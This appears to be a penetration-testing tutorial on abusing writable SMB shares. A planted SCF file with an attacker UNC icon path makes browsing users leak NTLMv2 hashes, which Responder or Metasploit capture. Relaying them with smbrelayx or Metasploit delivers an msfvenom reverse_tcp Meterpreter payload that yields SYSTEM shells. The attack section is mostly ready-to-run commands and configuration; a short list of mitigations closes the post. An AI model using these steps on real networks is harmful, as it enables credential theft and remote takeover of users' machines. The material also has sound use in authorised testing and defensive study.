SMB is a protocol which is widely used across organisations for file sharing purposes. It is not uncommon during internal penetration tests to discover a file share which contains sensitive information such as plain-text passwords and database connection strings. However even if a file share doesn’t contain any data that could be used to connect to other systems but it is configured with write permissions for unauthenticated users then it is possible to obtain passwords hashes of domain users or Meterpreter shells.

Gathering Hashes

It is not new that SCF (Shell Command Files) files can be used to perform a limited set of operations such as showing the Windows desktop or opening a Windows explorer. However a SCF file can be used to access a specific UNC path which allows the penetration tester to build an attack. The code below can be placed inside a text file which then needs to be planted into a network share.

[Shell]
Command=2
IconFile=\\X.X.X.X\share\pentestlab.ico
[Taskbar]
Command=ToggleDesktop

Saving the pentestlab.txt file as SCF file will make the file to be executed when the user will browse the file. Adding the @ symbol in front of the filename will place the pentestlab.scf on the top of the share drive.

Responder needs to be executed with the following parameters to capture the hashes of the users that will browse the share.

responder -wrf --lm -v -I eth0

When the user will browse the share a connection will established automatically from his system to the UNC path that is contained inside the SCF file. Windows will try to authenticate to that share with the username and the password of the user. During that authentication process a random 8 byte challenge key is sent from the server to the client and the hashed NTLM/LANMAN password is encrypted again with this challenge key. Responder will capture the NTLMv2 hash.

Alternatively to Responder, Metasploit Framework has a module which can be used to capture challenge-response password hashes from SMB clients.

auxiliary/server/capture/smb

As previously when the user will browse the same share his password hash will be captured by Metasploit.

If the password policy inside the company is sufficient it will take possibly days or weeks for the attacker to crack the captured hash.

Meterpreter Shells

The main advantage of the technique above it that it doesn’t require any user interaction and automatically enforces the user to connect to a share the doesn’t exist negotiating his NTLMv2 hash. Therefore it is also possible to combine this technique with SMB relay that will serve a payload in order to retrieve a Meterpreter shell from every user that will access the share.

MSFVenom can be used to generate the payload that it will executed on the target:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.171 LPORT=5555 -f exe > pentestlab.exe

Coresecurity has released a set of python scripts called Impacket that can perform various attacks against Windows protocols such as SMB. Using the smbrelayx python script it is possible to set up and SMB server that will serve a payload when the target host will try to connect. This will performed automatically since the SCF file will enforce every to user to connect to a non-existing share with their credentials.

./smbrelayx.py -h Target-IP -e ./pentestlab.exe

Metasploit Framework needs to be used as well in order to receive back the connection upon execution of the pentestlab.exe on the target.

exploit/multi/handler

The module needs to be configured with the same parameters as the generated payload.

set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.171
set LPORT 5555
exploit

When the user will browse the share the SMB server will receive the connection and it will use the username and the password hash to authenticate with his system and execute the payload to a writable share.

A Meterpreter session will received. However in order to avoid losing the connection it is necessary to migrate to a more stable process.

The migrate command and the process ID needs to be used.

In this example the process 1600 corresponds to svchost.exe process which is running with SYSTEM privileges.

Running the getuid from a Meterpreter console will obtain the current UID which is now SYSTEM.

The same attack can be also implemented by Metasploit framework.

exploit/windows/smb/smb_relay
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.171
exploit

An SMB server will established which will authenticate with the target by using the username and the password hash, deliver a payload on a writeable share, execute the payload with the rights of the user as a service, perform the clean up and give a Meterpreter session.

Interaction with the existing sessions can be performed with the sessions command.

Conclusion

This technique exploits something that is really common in all the networks like shares in order to retrieve password hashes and get meterpreter shells. The only requirement is that the user needs to browse the share that contains the malicious SCF file. However these attacks can be prevented by performing the following:

• Use of Kerberos Authentication and SMB Signing
• Disallow write permissions in file shares for unauthenticated users
• Ensure that NTLMv2 password hash is used instead of LanMan

References

• https://github.com/CoreSecurity/impacket
• https://pen-testing.sans.org/blog/2013/04/25/smb-relay-demystified-and-ntlmv2-pwnage-with-python
• https://1337red.wordpress.com/using-a-scf-file-to-gather-hashes/
• http://carnal0wnage.attackresearch.com/2009/04/using-metasploit-smb-sniffer-module.html
• https://room362.com/post/2016/smb-http-auth-capture-via-scf/
• https://blog.rapid7.com/2008/11/11/ms08-068-metasploit-and-smb-relay/
• https://cqureacademy.com/blog/penetration-testing/smb-relay-attack